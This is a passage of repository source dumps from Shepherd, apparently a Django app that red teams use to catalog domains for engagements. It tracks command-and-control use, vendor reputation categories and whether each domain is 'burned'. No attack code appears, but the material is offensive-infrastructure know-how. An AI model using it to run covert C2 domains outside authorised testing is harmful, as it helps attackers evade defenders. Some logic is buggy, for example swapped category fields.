= list(set(domain_categories))\n # Check if any categopries are suspect\n bad_categories = []\n for category in domain_categories:\n if category.lower() in self.blacklisted:\n bad_categories.append(category.capitalize())\n if bad_categories:\n burned = True\n burned_explanations.append('Tagged with a bad category')\n # Assemble the dictionary to return for this domain\n lab_results[domain] = {}\n lab_results[domain]['categories'] = {}\n lab_results[domain]['burned'] = burned\n lab_results[domain]['burned_explanation'] = ', '.join(burned_explanations)\n lab_results[domain]['health_dns'] = health_dns\n lab_results[domain]['categories']['all'] = ', '.join(bad_categories)\n lab_results[domain]['categories']['bad'] = ', '.join(domain_categories)\n lab_results[domain]['categories']['talos'] = ', '.join(talos_results)\n lab_results[domain]['categories']['xforce'] = ', '.join(xforce_results)\n lab_results[domain]['categories']['opendns'] = ', '.join(opendns_results)\n lab_results[domain]['categories']['bluecoat'] = ', '.join(bluecoat_results)\n lab_results[domain]['categories']['mxtoolbox'] = ', '.join(mxtoolbox_results)\n lab_results[domain]['categories']['fortiguard'] = ', '.join(fortiguard_results)\n lab_results[domain]['categories']['trendmicro'] = ', '.join(trendmicro_results)\n # Sleep for a while for VirusTotal's API\n sleep(self.request_delay)\n return lab_results\n"
},
{
"alpha_fraction": 0.6946293711662292,
"alphanum_fraction": 0.6955170631408691,
"avg_line_length": 42.346153259277344,
"blob_id": "b6a01ad4f3a8e5029d6f4b16e8e8df145d305290",
"content_id": "623875d6de0ff1b580bac6ef7afd1f464add3041",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2253,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 52,
"path": "/catalog/urls.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the URL mappings for the catalog application. The `urlpatterns` list\nroutes URLs to views. For more information please see:\n\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\n\"\"\"\n\nfrom . import views\nfrom django.conf.urls import include\nfrom django.urls import path, re_path\n\n\n# URLs for the basic domain views\nurlpatterns = [\n path('', views.index, name='index'),\n path('domains/', views.DomainListView.as_view(), name='domains'),\n path('avail_domains/', views.AvailDomainListView.as_view(), name='available-domains'),\n path('active_domains/', views.ActiveDomainListView.as_view(), name='active-domains'),\n path('res_domains/', views.ResDomainListView.as_view(), name='reserved-domains'),\n path('graveyard/', views.GraveyardListView.as_view(), name='graveyard'),\n path('domain/<int:pk>', views.DomainDetailView.as_view(), name='domain-detail'),\n path('mydomains/', views.ActiveDomainsByUserListView.as_view(), name='my-domains'),\n path('error/', views.error, name='error'),\n path('profile/', views.profile, name='profile'),\n]\n\n# URLs for creating, updating, and deleting project histories\nurlpatterns += [\n path('history/<int:pk>/create/', views.HistoryCreate.as_view(), name='history_create'),\n path('history/<int:pk>/update/', views.HistoryUpdate.as_view(), name='history_update'),\n path('history/<int:pk>/delete/', views.HistoryDelete.as_view(), name='history_delete'),\n]\n\n# URLs for creating, updating, and deleting domains\nurlpatterns += [\n path('domain/create/', views.DomainCreate.as_view(), name='domain_create'),\n path('domain/<int:pk>/update/', views.DomainUpdate.as_view(), name='domain_update'),\n path('domain/<int:pk>/delete/', views.DomainDelete.as_view(), name='domain_delete'),\n]\n\n# URLs for domain status change functions\nurlpatterns += [\n path('checkout/<int:pk>', views.checkout, name='checkout'),\n path('release/<int:pk>', views.release, name='release'),\n]\n\n# URLs for management functions\nurlpatterns += [\n path('management/', views.management, name='management'),\n path('update/', views.update, name='update'),\n path('update_dns/', views.update_dns, name='update_dns'),\n path('upload/csv/', views.upload_csv, name='upload_csv'),\n]"
},
{
"alpha_fraction": 0.6339143514633179,
"alphanum_fraction": 0.636082112789154,
"avg_line_length": 43.76039505004883,
"blob_id": "89c6f653be6bf982eb3b13b7e8fe5e29985b9db5",
"content_id": "4b4e91b6e52a2887012ac1d5a0d83758ccf67194",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22604,
"license_type": "permissive",
"max_line_length": 155,
"num_lines": 505,
"path": "/catalog/views.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the views for the catalog application's various webpages.\"\"\"\n\n# Import logging functionality\nimport logging\n\n# Django imports for generic views and template rendering\nfrom django.views import generic\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\n\n# Django imports for verifying a user is logged-in to access a view\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n# Django imports for verifying a user's permissions before accessing a function\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\n# Django imports for forms\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\n# Django Q imports for task management\nfrom django_q.tasks import async_task, result\n\n# Import for references to Django's settings.py\nfrom django.conf import settings\n\n# Import the catalog application's models\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom catalog.forms import CheckoutForm, DomainCreateForm\nfrom catalog.models import Domain, HealthStatus, DomainStatus, WhoisStatus, Client, History, User\n\n# Import the Django-Q models\nfrom django_q.models import Success, Task\n\n# Import Python libraries for various things\nimport csv\nimport codecs\nimport datetime\nfrom io import StringIO\nfrom io import TextIOWrapper\n\n\n# Setup logger\nlogger = logging.getLogger(__name__)\n\n\n##################\n# View Functions #\n##################\n\ndef index(request):\n \"\"\"View function for the home page, index.html.\"\"\"\n # Generate counts of some of the main objects\n num_domains = Domain.objects.all().count()\n # Get counts of domains for each status\n num_domains_burned = Domain.objects.filter(domain_status__domain_status='Burned').count()\n num_domains_reserved = Domain.objects.filter(domain_status__domain_status='Reserved').count()\n num_domains_available = Domain.objects.filter(domain_status__domain_status='Available').count()\n num_domains_unavailable = Domain.objects.filter(domain_status__domain_status='Unavailable').count()\n # If the user is authenticated, get the number of checked-out domains\n if request.user.is_authenticated:\n num_domains_out = History.objects.filter(operator=request.user,\n domain__domain_status__domain_status='Unavailable',\n end_date__gte=datetime.datetime.now()).count()\n else:\n num_domains_out = None\n # Prepare the context for index.html\n context = {\n 'num_domains': num_domains,\n 'num_domains_out': num_domains_out,\n 'num_domains_burned': num_domains_burned,\n 'num_domains_reserved': num_domains_reserved,\n 'num_domains_available': num_domains_available,\n 'num_domains_unavailable': num_domains_unavailable,\n }\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)\n\ndef error(request, error):\n \"\"\"View function for the error page, error.html. The error message passed to this view will\n be displayed on error.html.\n \"\"\"\n # Prepare the context for the error page\n context = {\n 'error_message': error,\n }\n # Generate counts of some of the main objects\n return render(request, 'catalog/error.html', context=context)\n\n@login_required\ndef profile(request):\n \"\"\"View function for the user profile, profile.html.\"\"\"\n # Get the current user's user object\n user = request.user\n # Look-up the username in the database\n current_user = User.objects.get(username=user.username)\n # Pass the results to the template\n return render(request, 'catalog/profile.html', {'current_user': current_user})\n\n@login_required\ndef checkout(request, pk):\n \"\"\"View function for domain checkout. The Primary Key passed to this view is used to look-up\n the requested domain.\n \"\"\"\n # Fetch the domain for the provided primary key\n domain_instance = get_object_or_404(Domain, pk=pk)\n # If this is a POST request then process the form data\n if request.method == 'POST':\n # Create a form instance and populate it with data from the request (binding):\n form = CheckoutForm(request.POST)\n # Check if the form is valid\n if form.is_valid():\n # Check if client exists and create it if not\n # TODO:\n # Change this to tie into a client manager\n # In the future this will be a dropdown or typeahead field\n client_name = form.cleaned_data['client']\n client = Client.objects.get(name__iexact=client_name)\n if not client:\n client_instance = Client(name=client_name)\n client_instance.save()\n client = Client.objects.get(name__iexact=client_name)\n # Process the data in form.cleaned_data as required\n history_instance = History(start_date=form.cleaned_data['start_date'],\n end_date=form.cleaned_data['end_date'],\n activity_type=form.cleaned_data['activity'],\n project_type=form.cleaned_data['project_type'],\n note=form.cleaned_data['note'],\n client=client,\n operator=request.user,\n domain=Domain.objects.get(pk=pk))\n # Commit the new project history\n history_instance.save()\n # Update the domain status and commit it\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Unavailable')\n domain_instance.last_used_by = request.user\n domain_instance.save()\n # Redirect to the user's checked-out domains\n return HttpResponseRedirect(reverse('my-domains'))\n # If this is a GET (or any other method) create the default form\n else:\n form = CheckoutForm(request.POST)\n # Prepare the context for the checkout form\n context = {\n 'form': form,\n 'domain_instance': domain_instance,\n 'domain_name': domain_instance.name\n }\n # Render the checkout form page\n return render(request, 'catalog/checkout.html', context)\n\n@login_required\ndef release(request, pk):\n \"\"\"View function for releasing a domain back to the pool. The Primary Key passed to this view is used to look-up\n the requested domain.\n \"\"\"\n # Fetch the domain for the provided primary key\n domain_instance = get_object_or_404(Domain, pk=pk)\n # If this is a GET request then check if domain can be released\n if request.method == 'GET':\n # Allow the action if the current user is the one who checked out the domain\n if request.user == domain_instance.last_used_by:\n # Reset domain status to `Available` and commit the change\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Available')\n domain_instance.save()\n # Redirect to the user's checked-out domains\n return HttpResponseRedirect(reverse('my-domains'))\n # Otherwise return an error message via error.html\n else:\n context = {\n 'error_message': 'Your user account does match the user that has checked out this domain, so you are not authorized to release it.'\n } \n return render(request, 'catalog/error.html', context)\n # If this is a POST (or any other method) redirect\n else:\n return HttpResponseRedirect(reverse('my-domains'))\n\n@login_required\ndef upload_csv(request):\n \"\"\"View function for uploading and processing csv files and importing domain names.\"\"\"\n # If the request is 'GET' return the upload page\n if request.method == 'GET':\n return render(request, 'catalog/upload_csv.html')\n # If not a GET, then proceed\n try:\n # Get the `csv_file` from the POSTed form data\n csv_file = request.FILES['csv_file']\n # Do a lame/basic check to see if this is a csv file\n if not csv_file.name.endswith('.csv'):\n messages.error(request, 'File is not CSV type')\n return HttpResponseRedirect(reverse('upload_csv'))\n # The file is loaded into memory, so this view must be aware of system limits\n if csv_file.multiple_chunks():\n messages.error(request, 'Uploaded file is too big (%.2f MB).' % (csv_file.size/(1000*1000),))\n return HttpResponseRedirect(reverse('upload_csv'))\n except Exception as e:\n logging.getLogger('error_logger').error('Unable to upload/read file. ' + repr(e))\n messages.error(request, 'Unable to upload/read file: ' + repr(e))\n # Loop over the lines and save the domains to the Domains model\n try:\n # Try to read the file data\n csv_file_wrapper = StringIO(csv_file.read().decode())\n csv_reader = csv.DictReader(csv_file_wrapper, delimiter=',')\n except Exception as e:\n logging.getLogger('error_logger').error('Unable to parse file. ' + repr(e))\n messages.error(request, 'Unable to parse file: ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n try:\n # Process each csv row and commit it to the database\n for entry in csv_reader:\n logging.getLogger('error_logger').info(\"Adding %s to the database\", entry['name'])\n # Try to format dates into the format Django expects them, YYYY-MM-DD\n # This just catches the other common format, MM-DD-YYYY\n # Other date formats will be missed and the user will see an error message after it fails to commit\n try:\n entry['creation'] = datetime.datetime.strptime(entry['creation'], '%m-%d-%Y').strftime('%Y-%m-%d')\n except:\n pass\n try:\n entry['expiration'] = datetime.datetime.strptime(entry['expiration'], '%m-%d-%Y').strftime('%Y-%m-%d')\n except:\n pass\n # Try to resolve the user-defined health_status value or default to `Healthy`\n try:\n health_status = HealthStatus.objects.get(health_status__iexact=entry['domain_status'])\n except:\n health_status = HealthStatus.objects.get(health_status='Healthy')\n entry['health_status'] = health_status\n # Try to resolve the user-defined whois_status value or default to `Enabled` as it usually is\n try:\n whois_status = WhoisStatus.objects.get(whois_status__iexact=entry['whois_status'])\n except:\n whois_status = WhoisStatus.objects.get(whois_status='Enabled')\n entry['whois_status'] = whois_status\n # Check if the optional note field is in the csv and add it as NULL if not\n if not 'note' in entry:\n entry['note'] = None\n # Check if the domain_status Foreign Key is in the csv and try to resolve the status\n if 'domain_status' in entry:\n try:\n domain_status = DomainStatus.objects.get(domain_status__iexact=entry['domain_status'])\n except:\n domain_status = DomainStatus.objects.get(domain_status='Available')\n entry['domain_status'] = domain_status\n else:\n domain_status = DomainStatus.objects.get(domain_status='Available')\n entry['domain_status'] = domain_status\n # The last_used_by field will only be set by Shepherd at domain check-out\n if 'last_used_by' in entry:\n entry['last_used_by'] = None\n else:\n entry['last_used_by'] = None\n # Try to pass the dict object to the Domain model\n try:\n new_domain = Domain(**entry)\n new_domain.save()\n # If there is an error, store as string and then display\n except Exception as e:\n logging.getLogger('error_logger').error(repr(e))\n messages.error(request, 'Issue processing data for ' + repr(entry['name']) + ': ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n except Exception as e:\n logging.getLogger('error_logger').error('Unable to read rows: ' + repr(e))\n messages.error(request, 'Unable to read rows: ' + repr(e))\n return HttpResponseRedirect(reverse('upload_csv'))\n\n@login_required\ndef update(request):\n \"\"\"View function to display the control panel for updating domain information.\"\"\"\n # Check if the request is a POST and proceed with the task\n if request.method == 'POST':\n # Add an async task grouped as `Domain Updates`\n task_id = async_task('tasks.check_domains', group='Domain Updates', hook='tasks.send_slack_complete_msg')\n # Return to the update.html page with the confirmation message\n messages.success(request, 'Task ID {} has been successfully queued!'.format(task_id))\n return HttpResponseRedirect(reverse('update'))\n else:\n # Collect data for rendering the page\n total_domains = Domain.objects.all().count()\n try:\n sleep_time = settings.DOMAINCHECK_CONFIG['sleep_time']\n update_time = round(total_domains * sleep_time / 60, 2)\n except:\n sleep_time = 20\n update_time = round(total_domains * sleep_time / 60, 2)\n try:\n # Get the latest completed task from `Domain Updates`\n queryset = Task.objects.filter(group='Domain Updates')[0]\n # Get the task's start date and time\n last_update_requested = queryset.started\n # Get the task's completed time\n last_result = queryset.result\n # Check if the task was flagged as successful or failed\n if queryset.success:\n last_update_completed = queryset.stopped\n last_update_time = round(queryset.time_taken() / 60, 2)\n else:\n last_update_completed = 'Failed'\n last_update_time = ''\n except:\n last_update_requested = 'Never Successfully Run'\n last_update_completed = ''\n last_update_time = ''\n last_result = ''\n context = {\n 'total_domains': total_domains,\n 'update_time': update_time,\n 'last_update_requested': last_update_requested,\n 'last_update_completed': last_update_completed,\n 'last_update_time': last_update_time,\n 'last_result': last_result,\n 'sleep_time': sleep_time\n }\n return render(request, 'catalog/update.html', context=context)\n\n@login_required\ndef update_dns(request):\n \"\"\"View function to display the control panel for updating domain DNS records.\"\"\"\n # Check if the request is a POST and proceed with the task\n if request.method == 'POST':\n # Add an async task grouped as `DNS Updates`\n task_id = async_task('tasks.update_dns', group='DNS Updates', hook='tasks.send_slack_complete_msg')\n # Return to the update.html page with the success message\n messages.success(request, 'Task ID {} has been successfully queued!'.format(task_id))\n return HttpResponseRedirect(reverse('update_dns'))\n else:\n # Collect data for rendering the page\n try: \n queryset = Task.objects.filter(group='DNS Updates')[0]\n last_update_requested = queryset.started\n last_result = queryset.result\n if queryset.success:\n last_update_completed = queryset.stopped\n last_update_time = round(queryset.time_taken() / 60, 2)\n else:\n last_update_completed = 'Failed'\n last_update_time = ''\n except:\n last_update_requested = 'Never Successfully Run'\n last_update_completed = ''\n last_update_time = ''\n last_result = ''\n context = {\n 'last_update_requested': last_update_requested,\n 'last_update_completed': last_update_completed,\n 'last_update_time': last_update_time,\n 'last_result': last_result\n }\n return render(request, 'catalog/update_dns.html', context=context)\n\n@login_required\ndef management(request):\n \"\"\"View function to display the current settings configured for Shepherd.\"\"\"\n # Get the DOMAINCHECK_CONFIG dictionary from settings.py\n if settings.DOMAINCHECK_CONFIG:\n config = settings.DOMAINCHECK_CONFIG\n # Pass the relevant settings to management.html\n context = {\n 'virustotal_api_key': config['virustotal_api_key'],\n 'sleep_time': config['sleep_time']\n }\n return render(request, 'catalog/management.html', context=context)\n\n################\n# View Classes #\n################\n\nclass DomainListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing all registered domains. This view defaults to the domain_list.html template.\"\"\"\n model = Domain\n paginate_by = 25\n\n def get_queryset(self):\n \"\"\"Customize the queryset based on search.\"\"\"\n # Check if a search parameter is in the request\n try:\n search_term = order_by = self.request.GET.get('domain_search')\n except:\n search_term = ''\n # If there is a search term, filter the query by domain name or category\n # TODO: We might consider using keywords like `category:technology` to search different fields\n if search_term:\n queryset = super(DomainListView, self).get_queryset()\n return queryset.filter(Q(name__icontains=search_term) | Q(all_cat__icontains=search_term)).order_by('name')\n else:\n return Domain.objects.all().order_by('domain_status')\n\n\nclass AvailDomainListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing only available domains. This view calls the available_domains.html template.\"\"\"\n model = Domain\n queryset = Domain.objects.filter(domain_status__domain_status='Available').order_by('name')\n template_name = 'catalog/available_domains.html'\n paginate_by = 25\n\n\nclass ActiveDomainListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing only available domains. This view calls the active_domains.html template.\"\"\"\n model = Domain\n queryset = Domain.objects.filter(domain_status__domain_status='Unavailable').order_by('name')\n template_name = 'catalog/active_domains.html'\n paginate_by = 25\n\n\nclass ResDomainListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing only reserved domains. This view calls the reserved_domains.html template.\"\"\"\n model = Domain\n queryset = Domain.objects.filter(domain_status__domain_status='Reserved').order_by('name')\n template_name = 'catalog/reserved_domains.html'\n paginate_by = 25\n\n\nclass GraveyardListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing only burned and retired domains. This view calls the graveyard.html template.\"\"\"\n model = Domain\n queryset = Domain.objects.filter(domain_status__domain_status='Burned')\n template_name = 'catalog/graveyard.html'\n paginate_by = 25\n\n\nclass DomainDetailView(LoginRequiredMixin, generic.DetailView):\n \"\"\"View showing the details for the specified domain. This view defaults to the domain_detail.html\n template.\n \"\"\"\n model = Domain\n\n\nclass ActiveDomainsByUserListView(LoginRequiredMixin, generic.ListView):\n \"\"\"View showing only the domains checked-out by the current user. This view calls the\n active_domains_user.html template.\n \"\"\"\n model = History\n template_name = 'catalog/active_domains_user.html'\n paginate_by = 25\n\n def get_queryset(self):\n \"\"\"Modify this built-in function to filter results from the History by the current user.\"\"\"\n # Only return project entries for the current user where the current domain status is `Unavailable`\n return History.objects.filter(operator=self.request.user,\n domain__domain_status__domain_status='Unavailable',\n end_date__gte=datetime.datetime.now()).order_by('end_date')\n\n\nclass HistoryCreate(LoginRequiredMixin, CreateView):\n \"\"\"View for creating new project history entries. This view defaults to the\n history_form.html template.\n \"\"\"\n model = History\n fields = '__all__'\n success_url = reverse_lazy('domains')\n\n def get_initial(self):\n \"\"\"Set the initial values for the form.\"\"\"\n domain = get_object_or_404(Domain, pk=self.kwargs.get('pk'))\n return {\n 'domain': domain,\n }\n\n\nclass HistoryUpdate(LoginRequiredMixin, UpdateView):\n \"\"\"View for updating existing project history entries. This view defaults to the\n history_form.html template.\n \"\"\"\n model = History\n fields = ['client', 'activity_type', 'project_type', 'end_date', 'note', 'operator']\n success_url = reverse_lazy('domains')\n\n\nclass HistoryDelete(LoginRequiredMixin, DeleteView):\n \"\"\"View for deleting existing project history entries. This view defaults to the\n history_confirm_delete.html template.\n \"\"\"\n model = History\n success_url = reverse_lazy('domains')\n\n\nclass DomainCreate(LoginRequiredMixin, CreateView):\n \"\"\"View for creating new domain name entries. This view defaults to the\n domain_form.html template.\n \"\"\"\n model = Domain\n form_class = DomainCreateForm\n success_url = reverse_lazy('domains')\n\n\nclass DomainUpdate(LoginRequiredMixin, UpdateView):\n \"\"\"View for updating existing domain name entries. This view defaults to the\n history_form.html template.\n \"\"\"\n model = Domain\n fields = '__all__'\n success_url = reverse_lazy('domains')\n\n\nclass DomainDelete(LoginRequiredMixin, DeleteView):\n \"\"\"View for deleting existing domain name entries.his view defaults to the\n domain_confirm_delete.html template.\n \"\"\"\n model = Domain\n success_url = reverse_lazy('domains')\n"
},
{
"alpha_fraction": 0.678742527961731,
"alphanum_fraction": 0.6844311356544495,
"avg_line_length": 49.099998474121094,
"blob_id": "7e936ed4e3a30775160b14c9761f1307f73802a7",
"content_id": "5870d7fa7fd5d5d6627d89bfc139fda445643acc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10020,
"license_type": "permissive",
"max_line_length": 210,
"num_lines": 200,
"path": "/catalog/models.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the database models for the catalog application.\"\"\"\n\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom datetime import date\n\n\nclass HealthStatus(models.Model):\n \"\"\"Model representing the available domain health settings.\"\"\"\n health_status = models.CharField(max_length=20, unique=True, help_text='Health status type (e.g. Healthy, Burned)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['health_status']\n verbose_name = 'Health status'\n verbose_name_plural = 'Health statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.health_status\n\n\nclass DomainStatus(models.Model):\n \"\"\"Model representing the available domain statuses.\"\"\"\n domain_status = models.CharField(max_length=20, unique=True, help_text='Domain status type (e.g. Available)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['domain_status']\n verbose_name = 'Domain status'\n verbose_name_plural = 'Domain statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.domain_status\n\n\nclass WhoisStatus(models.Model):\n \"\"\"Model representing the available WHOIS privacy statuses.\"\"\"\n whois_status = models.CharField(max_length=20, unique=True, help_text='WHOIS privacy status (e.g. Enabled, Disabled)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['whois_status']\n verbose_name = 'WHOIS status'\n verbose_name_plural = 'WHOIS statuses'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.whois_status\n\n\nclass ActivityType(models.Model):\n \"\"\"Model representing the available domain activity types.\"\"\"\n activity = models.CharField(max_length=100, unique=True, help_text='Enter a reason for the use of the domain (e.g. command-and-control)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['activity']\n verbose_name = 'Domain activity'\n verbose_name_plural = 'Domain activities'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.activity\n\n\nclass ProjectType(models.Model):\n \"\"\"Model representing the available project types.\"\"\"\n project_type = models.CharField('Project Type', max_length=100, unique=True, help_text='Enter a project type (e.g. red team, penetration test)')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['project_type']\n verbose_name = 'Project type'\n verbose_name_plural = 'Project types'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.project_type\n\n\nclass Client(models.Model):\n \"\"\"Model representing the clients attached to project records. This model tracks client\n information. Addition details can be added beyond the client's name, but it likely\n unnecessary for the catalog.\n \"\"\"\n name = models.CharField('Client Name', max_length=100, unique=True, help_text='Enter the name of the client')\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['name']\n verbose_name = 'Client'\n verbose_name_plural = 'Clients'\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return self.name\n\n\nclass Domain(models.Model):\n \"\"\"Model representing the domains and related information. This is the primary model for the\n catalog application. This model keeps a record of the domain name and the domain's health,\n categories, and current status (e.g. Available).\n\n The availability and health statuses are Foreign Keys.\n \"\"\"\n name = models.CharField('Name', max_length=100, unique=True, help_text='Enter a domain name')\n registrar = models.CharField('Registrar', max_length=100, help_text='Enter the name of the registrar where this domain is registered', null=True, blank=True)\n dns_record = models.CharField('DNS Record', max_length=500, help_text='Enter domain DNS records', null=True, blank=True)\n health_dns = models.CharField('DNS Health', max_length=100, help_text='Domain health status based on passive DNS (e.g. Healthy, Burned)', null=True, blank=True)\n creation = models.DateField('Purchase Date', help_text='Domain purchase date')\n expiration = models.DateField('Expiration Date', help_text='Domain expiration date')\n all_cat = models.TextField('All Categories', help_text='All categories applied to this domain', null=True, blank=True)\n ibm_xforce_cat = models.CharField('IBM X-Force', max_length=100, help_text='Domain category as determined by IBM X-Force', null=True, blank=True)\n talos_cat = models.CharField('Cisco Talos', max_length=100, help_text='Domain category as determined by Cisco Talos', null=True, blank=True)\n bluecoat_cat =models.CharField('Bluecoat', max_length=100, help_text='Domain category as determined by Bluecoat', null=True, blank=True)\n fortiguard_cat = models.CharField('Fortiguard', max_length=100, help_text='Domain category as determined by Fortiguard', null=True, blank=True)\n opendns_cat = models.CharField('OpenDNS', max_length=100, help_text='Domain category as determined by OpenDNS', null=True, blank=True)\n trendmicro_cat = models.CharField('TrendMicro', max_length=100, help_text='Domain category as determined by TrendMicro', null=True, blank=True)\n mx_toolbox_status = models.CharField('MX Toolbox Status', max_length=100, help_text='Domain spam status as determined by MX Toolbox', null=True, blank=True)\n note = models.TextField('Notes', help_text='Domain-related notes, such as thoughts behind its purchase or how/why it was burned or retired', null=True, blank=True)\n burned_explanation = models.TextField('Health Explanation', help_text='Reasons why the domain\\'s health status is not \"Healthy\"', null=True, blank=True)\n # Foreign Keys\n whois_status = models.ForeignKey('WhoisStatus', on_delete=models.PROTECT, null=True, blank=True)\n health_status = models.ForeignKey('HealthStatus', on_delete=models.PROTECT, null=True, blank=True)\n domain_status = models.ForeignKey('DomainStatus', on_delete=models.PROTECT, null=True, blank=True)\n last_used_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True)\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['health_status', 'name']\n permissions = (('can_retire_domain', 'Can retire a domain'), ('can_mark_reserved', 'Can reserve a domain'),)\n verbose_name = 'Domain'\n verbose_name_plural = 'Domains'\n\n def get_absolute_url(self):\n \"\"\"Returns the URL to access a particular instance of the model.\"\"\"\n # Adds a \"View on Site\" button to the model's record editing screens in the Admin site\n return reverse('domain-detail', args=[str(self.id)])\n\n def get_domain_age(self):\n \"\"\"Calculate the domain's age based on the current date and the domain's purchase date.\"\"\"\n time_delta = datetime.date.today() - self.creation\n return time_delta.days\n\n @property\n def get_list(self):\n \"\"\"Property to enable fetching the list from the dns_record entry.\"\"\"\n if self.dns_record:\n return self.dns_record.split(' ::: ')\n else:\n None\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return f'{self.name} ({self.health_status})'\n\n\nclass History(models.Model):\n \"\"\"Model representing the project history. This model records start and end dates for a project\n and then uses Foreign Keys for linking the dates to a client, project type, activity type, and\n domain.\n \"\"\"\n # This field is automatically filled with the current date at check-out\n start_date = models.DateField('Start Date', auto_now_add=True, max_length=100, help_text='Enter the start date of the project')\n end_date = models.DateField('End Date', max_length=100, help_text='Enter the end date of the project')\n note = models.TextField('Notes', help_text='Project-related notes, such as how the domain will be used/how it worked out', null=True, blank=True)\n slack_channel = models.CharField('Project Slack Channel', max_length=100, help_text='Name of the Slack channel to be used for updates for this domain during the project\\'s duration', null=True, blank=True)\n # Foreign Keys\n client = models.ForeignKey('Client', on_delete=models.CASCADE, null=False)\n domain = models.ForeignKey('Domain', on_delete=models.CASCADE, null=False)\n operator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True)\n project_type = models.ForeignKey('ProjectType', on_delete=models.PROTECT, null=False)\n activity_type = models.ForeignKey('ActivityType', on_delete=models.PROTECT, null=False, blank=True)\n\n class Meta:\n \"\"\"Metadata for the model.\"\"\"\n ordering = ['client', 'domain']\n verbose_name = 'Historical project'\n verbose_name_plural = 'Historical projects'\n\n def get_absolute_url(self):\n \"\"\"Returns the URL to access a particular instance of the model.\"\"\"\n # Adds a \"View on Site\" button to the model's record editing screens in the Admin site\n return reverse('history_update', args=[str(self.id)])\n\n def __str__(self):\n \"\"\"String for representing the model object (in Admin site etc.).\"\"\"\n return f'{self.client} {self.project.project_type} - {self.domain.name} ({self.activitytype.activity}) {self.start_date} to {self.end_date} - {self.operator}'\n\n @property\n def is_overdue(self):\n \"\"\"Property to test if the provided end date is in the past.\"\"\"\n if self.start_date and date.today() > self.end_date:\n return True\n return False\n"
},
{
"alpha_fraction": 0.7445255517959595,
"alphanum_fraction": 0.7445255517959595,
"avg_line_length": 18.571428298950195,
"blob_id": "e79181b656e73b0b663ef34ff4ba443d40a5bdb9",
"content_id": "9a726c9412690e9d87fcffebb478fa321df3739e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 137,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 7,
"path": "/catalog/apps.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This defines the available applications.\"\"\"\n\nfrom django.apps import AppConfig\n\n\nclass CatalogConfig(AppConfig):\n name = 'catalog'\n"
}
] | 14 |
Mae317/Mae | https://github.com/Mae317/Mae | a5d4c0484a9c6dc6e02230c18d33283171f522db | a7ae1cb3caeab7684f8b5bb4bf97addcbe407325 | 22eb25fe7a1bda54ca745c7d3ca3266b5ca08822 | refs/heads/main | 2023-03-14T04:18:49.835163 | 2021-03-13T21:23:28 | 2021-03-13T21:23:28 | 347,472,250 | 0 | 0 | null | 2021-03-13T20:30:09 | 2021-03-13T20:46:07 | 2021-03-13T21:23:28 | Python | [
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 6,
"blob_id": "8ef4c239aff7d370ce1a5be3f413eb7758bbcdc0",
"content_id": "eb690e98c5b30a8593d9fb5beee0dabcba949d8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 3,
"path": "/README.md",
"repo_name": "Mae317/Mae",
"src_encoding": "UTF-8",
"text": "# Mae\nCoursera\nhello\n"
